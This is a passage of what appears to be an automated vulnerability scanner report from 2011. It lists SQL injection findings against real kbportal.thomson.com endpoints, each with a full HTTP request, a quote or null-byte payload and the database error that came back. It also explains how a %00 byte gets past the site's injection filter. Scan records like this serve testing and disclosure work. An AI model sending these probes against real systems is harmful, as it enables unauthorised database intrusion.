Date: Tue, 26 Apr 2011 23:02:14 GMT
Server: Omniture DC/2.0.0
Content-Length: 439
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/ranhrollup/1/H.22.1/s79787087680306 was not fo
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/ranhrollup/1/H.22.1/s79787087680306?AQB=1&ndh=1&t=26%2F3%2F2011%2017%3A19%3A47%202%20300&ns=randomhouse&pageName=about%3Afaq%3Aindex.php%3A%3A&g=http%3A%2F%2Fwww.randomhouse.com%2Fabout%2Ffaq%2Findex.php%3FToDo%3Dcontact&r=http%3A%2F%2Fwww.randomhouse.com%2Fabout%2Fcontact.html&cc=USD&ch=about%2Ffaq&events=event8&c17=about%3Acontact.html%3A%3A&c18=e-mail%20Customer%20Service&c19=about%3Acontact.html%3A%3A%20%7C%20e-mail%20Customer%20Service&c24=www.randomhouse.com%2Fabout%2F&v24=www.randomhouse.com%2Fabout%2F&c25=www.randomhouse.com%2Fabout%2Ffaq%2F&v25=www.randomhouse.com%2Fabout%2Ffaq%2F&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1095&bh=937&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=about%3Acontact.html%3A%3A&pidt=1&oid=http%3A%2F%2Fwww.randomhouse.com%2Fabout%2Ffaq%2Findex.php%3FToDo%3Dcontact&ot=A&AQE=1 HTTP/1.1
Host: code.randomhouse.com
Proxy-Connection: keep-alive
Referer: http://www.randomhouse.com/about/faq/index.php?ToDo=contact
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; mbox=session#1303855598284-166145#1303858226|PC#1303855598284-166145#1366928366|check#true#1303856426; s_sq=ranhrollup%3D%2526pid%253Dabout%25253Acontact.html%25253A%25253A%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.randomhouse.com%25252Fabout%25252Ffaq%25252Findex.php%25253FToDo%25253Dcontact%2526ot%253DA; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_cc=true; SC_LINKS=%5B%5BB%5D%5D

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 23:02:13 GMT
Server: Omniture DC/2.0.0
xserver: www369
Content-Length: 0
Content-Type: text/html


1.6. http://kbportal.thomson.com/ [PW parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://kbportal.thomson.com
Path:   /

Issue detail

The PW parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the PW parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request

GET /?cid=21&c=12&cpc=0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70&UN=CSO&PW=CSO%00' HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; BIGipServerKB-80=428295335.20480.0000; PortalSettings=cpId~88|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~B3B3BA|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/BuiltIn/Default/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; s_cc=true; LangCode=en-US; LangId=1; IWICategory=IWICategory=; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849784869%27%5D%5D; c_m2=1; c=undefined571422undefined; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=support%3Acontact-us%3Adefault; s_ppv=0; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 500 Internal Server Error
Date: Tue, 26 Apr 2011 20:47:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7066

<html>
<head>
<title>ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string 'CSO'.
ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near 'CSO'.</title>
...[SNIP]...

1.7. http://kbportal.thomson.com/ [UN parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://kbportal.thomson.com
Path:   /

Issue detail

The UN parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the UN parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request

GET /?cid=21&c=12&cpc=0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70&UN=CSO%00'&PW=CSO HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; BIGipServerKB-80=428295335.20480.0000; PortalSettings=cpId~88|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~B3B3BA|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/BuiltIn/Default/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; s_cc=true; LangCode=en-US; LangId=1; IWICategory=IWICategory=; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849784869%27%5D%5D; c_m2=1; c=undefined571422undefined; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=support%3Acontact-us%3Adefault; s_ppv=0; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 500 Internal Server Error
Date: Tue, 26 Apr 2011 20:46:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7066

<html>
<head>
<title>ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string 'CSO'.
ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near 'CSO'.</title>
...[SNIP]...

1.8. http://kbportal.thomson.com/ [cid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://kbportal.thomson.com
Path:   /

Issue detail

The cid parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the cid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request

GET /?cid=21%00'&c=12&cpc=0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70&UN=CSO&PW=CSO HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; BIGipServerKB-80=428295335.20480.0000; PortalSettings=cpId~88|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~B3B3BA|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/BuiltIn/Default/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; s_cc=true; LangCode=en-US; LangId=1; IWICategory=IWICategory=; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849784869%27%5D%5D; c_m2=1; c=undefined571422undefined; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=support%3Acontact-us%3Adefault; s_ppv=0; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 26 Apr 2011 20:44:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6551

<html>
<head>
<title>ERROR [42S22] [Microsoft][ODBC SQL Server Driver][SQL Server]Invalid column name 'Lan_code'.</title>
<style>
   body {font-family:"Verdana";font-weig
...[SNIP]...

1.9. http://kbportal.thomson.com/ [cpc parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://kbportal.thomson.com
Path:   /

Issue detail

The cpc parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the cpc parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request

GET /?cid=21&c=12&cpc=0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70%00'&UN=CSO&PW=CSO HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; BIGipServerKB-80=428295335.20480.0000; PortalSettings=cpId~88|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~B3B3BA|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/BuiltIn/Default/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; s_cc=true; LangCode=en-US; LangId=1; IWICategory=IWICategory=; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849784869%27%5D%5D; c_m2=1; c=undefined571422undefined; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=support%3Acontact-us%3Adefault; s_ppv=0; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 26 Apr 2011 20:46:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7472

<html>
<head>
<title>ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string '0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70'.
ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near '0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70'.</title>
...[SNIP]...

1.10. http://kbportal.thomson.com/display/2/login.aspx [cpid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://kbportal.thomson.com
Path:   /display/2/login.aspx

Issue detail

The cpid parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the cpid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /display/2/login.aspx?cpid=21'&username=CSO&password=CSO&c=12&cpc=0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70&cid=21&t=&aid=&cat=&catURL=&r=0.754933476448059&searchstring=&searchtype= HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c=undefined571419undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; PortalSettings=cpId~21|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/20/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; BIGipServerKB-80=428295335.20480.0000; IWICategory=IWICategory=; s_cc=true; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=store%3Asecure%3Aemptybasket; s_sq=%5B%5BB%5D%5D; s_ppv=100

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 26 Apr 2011 20:32:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6451

<html>
<head>
<title>ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near ''.</title>
<style>
   body {font-family:"Verdana";font-weight:nor
...[SNIP]...

1.11. http://kbportal.thomson.com/display/2/login.aspx [password parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://kbportal.thomson.com
Path:   /display/2/login.aspx

Issue detail

The password parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the password parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request

GET /display/2/login.aspx?cpid=21&username=CSO&password=CSO%00'&c=12&cpc=0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70&cid=21&t=&aid=&cat=&catURL=&r=0.754933476448059&searchstring=&searchtype= HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; c_m2=1; c=undefined571419undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_ppv=0; s_sq=%5B%5BB%5D%5D; IWICategory=IWICategory=21; ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; PortalSettings=cpId~21|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/20/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; BIGipServerKB-80=428295335.20480.0000

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 26 Apr 2011 20:05:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7066

<html>
<head>
<title>ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string 'CSO'.
ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near 'CSO'.</title>
...[SNIP]...

1.12. http://kbportal.thomson.com/display/2/login.aspx [username parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://kbportal.thomson.com
Path:   /display/2/login.aspx

Issue detail

The username parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the username parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request

GET /display/2/login.aspx?cpid=21&username=CSO%00'&password=CSO&c=12&cpc=0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70&cid=21&t=&aid=&cat=&catURL=&r=0.754933476448059&searchstring=&searchtype= HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; c_m2=1; c=undefined571419undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_ppv=0; s_sq=%5B%5BB%5D%5D; IWICategory=IWICategory=21; ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; PortalSettings=cpId~21|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/20/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; BIGipServerKB-80=428295335.20480.0000

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 26 Apr 2011 20:05:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7066

<html>
<head>
<title>ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string 'CSO'.
ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near 'CSO'.</title>
...[SNIP]...

1.13. http://kbportal.thomson.com/index.aspx [cid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://kbportal.thomson.com
Path:   /index.aspx

Issue detail

The cid parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the cid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request

GET /index.aspx?t=&article=&c=12&cid=21%00'&cpc=mCUbki05i2q2gM801Slr08SHaX285EO45&cat=&catURL= HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; BIGipServerKB-80=428295335.20480.0000; PortalSettings=cpId~88|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~B3B3BA|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/BuiltIn/Default/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; c_m2=1; c=undefined572000undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%5D; gpv_pn=support%3Acontact-us%3Adefault; s_ppv=49; s_cc=true; s_sq=; 